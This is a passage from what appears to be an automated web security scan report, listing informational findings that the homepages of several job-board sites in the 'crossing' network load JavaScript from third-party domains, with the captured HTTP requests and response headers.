<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.322. http://www.dotnetcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dotnetcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=r5bbu9cr0v14lapurelqu9r7t1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111450

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.323. http://www.ecommercecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ecommercecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jkaapevh1eqi41fjlqg0qqj0f4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122922

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.324. http://www.edfed.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.edfed.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.google-analytics.com/urchin.js
http://www.studentloanfoundation.org/tmviewbanner.php?lpgid=114&wsid=21&cid=4208&bid=351&compid=43&style=js&lpgprty=B&tp=B

Request

GET / HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=esnafiva63v7f9obfldsvpdko0; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154433

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
</noscript><script language='JavaScript' type='text/javascript' src='http://www.studentloanfoundation.org//tmviewbanner.php?lpgid=114&wsid=21&cid=4208&bid=351&compid=43&style=js&lpgprty=B&tp=B'></script>
...[SNIP]...

           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.325. http://www.editingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.editingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9718dh1vf5ni8ge10ijt7ncv93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.326. http://www.educationcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.educationcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cv80umbmrn1jnbk6im77qu8nf1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.327. http://www.employmentauthority.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.employmentauthority.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 86027

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Employment Services, Executive Employment, Executive Search Consultants, Executive Job Openings</title>
<met
...[SNIP]...
<br>
<script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.328. http://www.employmentcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.employmentcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ep2g7l3vs5a5pub16rrihs9jp3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

15.329. http://www.energycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.energycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i3h90hnvarkvvcfesqumj8vhf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117799

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.330. http://www.engineeringcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.engineeringcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u76d1au7ldsubj9jq17ge4lui3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.331. http://www.entrylevelcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.entrylevelcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u5gd5nbnop8c3jphrctn63t6f2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149370

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.332. http://www.environmentalcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.environmentalcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
